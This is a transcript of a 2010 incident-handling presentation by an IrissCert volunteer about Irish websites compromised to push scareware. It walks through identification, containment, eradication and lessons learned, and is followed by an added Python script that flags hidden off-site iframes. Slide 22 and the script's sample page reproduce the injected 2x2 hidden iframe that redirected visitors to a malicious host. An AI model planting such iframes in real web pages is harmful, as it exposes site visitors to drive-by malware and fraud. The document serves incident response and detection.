Scareware Traversing the World via Ireland
As a volunteer handler for IrissCert, I was notified of several Irish websites being compromised and containing malicious code. The presentation covers the investigation and incident handling process followed.

Published in: Technology, News & Politics

Transcript

  • 1. Scareware Traversing the World via an Irish Web Exploit. Mark Hillick (@markofu), IrissCert Incident Handler. Friday 17 September 2010
  • 2. Presentations: 99%
  • 3. Ireland
  • 4. Ireland: CSIRT/CERT?
  • 5. Europe
  • 6. Introducing IRISS: Volunteer handlers; Local Security Professionals; Weekly handler shifts; Not-for-profit organization
  • 7. What do we see?
  • 8. How do users feel? 2/3 have been victims; < 10% feel very safe; 97% expect to be victims; Law Enforcement & Businesses lack resources
  • 9. Why we’re here!
  • 10. ALERTS: IRISS custom
  • 11. Scareware
  • 12. $$$$: FBI -> $150 million
  • 13. How easy? Very :-(
  • 14. Growth
  • 15. Scareware Evolving
  • 16. Remember Zen and the art of incident handling ...
  • 17. Reactions
  • 18. Reactions
  • 19. Reactions
  • 20. Identification: Gather information; Analysis; Determine
  • 21. Identification - Vector: Legitimate Websites
  • 22. Identification - WA: Not visible iframe injection • <iframe frameborder = 0 height = 2 width = 2 src ="http://jobstopfil.biz/tds_a/go.php/go.php?id=4" /></body>
  • 23. Identification - iframe
  • 24. Identification - WA: DNS requests; HTTP • Gets • Posts; Scripts
  • 25. Identification - SW
  • 26. Identification - SW
  • 27. Identification - SW
  • 28. Identification - SW
  • 29. Identification - Analysis: Exploited Sites hosted on one server; Weak FTP passwords (e.g. Ghost61); Two most popular web site attacks – • Gumblar - PHP Sites • Asprox - SQL Injection
  • 30. Containment: Verify; Stop the Spread • Remove • Notify • Inform; Blackhole. Source: Profound Whatever - Flickr Creative Commons
  • 31. Eradication: Remove; Improve; Vulnerability Analysis; Restore
  • 32. Eradication - How?
  • 33. Eradication - Hosting: Struggle but...
  • 34. Recovery. Source: Dilbert ©2009, United Feature Syndicate, Inc.
  • 35. Recovery - Be Sure! Validate, Restore & Monitor
  • 36. Lessons Learned
  • 37. Lessons Learned: Things required for an IR plan - • IR Team • Contact List • Regular Reviews • Escalation Process
  • 38. Lessons Learned: Awareness; Back-up & test the restore ;-); Patch; Test website for vulnerabilities & exploits; Defence-in-depth; Free Local & Online tools for safer browsing & analysis
  • 39. Lessons Learned: “A website must be able to protect itself from a hostile browser and a browser must be able to protect itself from a hostile website” Jeremiah Grossman (Feb. 2010)
  • 40. Lessons Learned - Prep: Fail to Prepare, well you know the rest :)
  • 41. Scareware Evolution. Source: http://www.f-secure.com
  • 42. What do you use?
  • 43. Thank you very much (go raibh míle maith agat). Twitter: @markofu @irisscert @hackeire #irisscon. Google-Fu: “scareware site:sans.org”. Unless stated, source of images -> Flickr Creative Commons, iStockPhoto or my own!!
  • 44. Well......
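The hidden-iframe injection on slide 22 (a 2x2, borderless iframe pointing off-site, dropped in just before `</body>`) is the kind of indicator a site owner can scan their own pages for. The following Python is an added example, not part of the presentation or of IRISS tooling: it parses a page and flags iframes that are both concealed (tiny or CSS-hidden) and load from a host other than the site's own; the HTML, the site host `www.example-site.ie` and the domains `hidden-redirect.example` and `tracker.example` are constructed sample data.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: a legitimate same-site iframe, a 2x2 borderless
# off-site iframe modelled on the slide-22 injection (placeholder domain),
# and a CSS-hidden off-site iframe.
SAMPLE_HTML = """<html><body><p>Welcome</p>
<iframe src="https://www.example-site.ie/video" width="640" height="360"></iframe>
<iframe frameborder = 0 height = 2 width = 2 src ="http://hidden-redirect.example/tds_a/go.php?id=4" />
<iframe src="http://tracker.example/x" style="display: none"></iframe>
</body></html>"""


def _px(value, default=10_000):
    """Parse a width/height attribute; unparseable values ('100%', missing) count as large."""
    m = re.match(r"\s*(\d+)\s*(px)?\s*$", value or "")
    return int(m.group(1)) if m else default


class HiddenIframeFinder(HTMLParser):
    """Collects iframes that are concealed AND load content from another host."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):  # HTMLParser also routes <iframe ... /> here
        if tag.lower() != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []
        if _px(a.get("width")) <= 3 and _px(a.get("height")) <= 3:
            reasons.append("tiny")  # e.g. the 2x2 frame on slide 22
        style = re.sub(r"\s+", "", a.get("style", "").lower())
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("css-hidden")
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        # A tiny/hidden frame alone is not proof; flag it only when it also points off-site.
        if reasons and host and host != self.page_host:
            self.findings.append({"src": a["src"], "host": host, "reasons": reasons})


def find_hidden_iframes(html, page_host):
    """Return the concealed off-site iframes found in html, in document order."""
    finder = HiddenIframeFinder(page_host)
    finder.feed(html)
    finder.close()
    return finder.findings
```

Run it over a saved copy of each page on the affected server and compare the findings against the site's known, intentional embeds; anything else warrants a look at the FTP logs and the file's modification time.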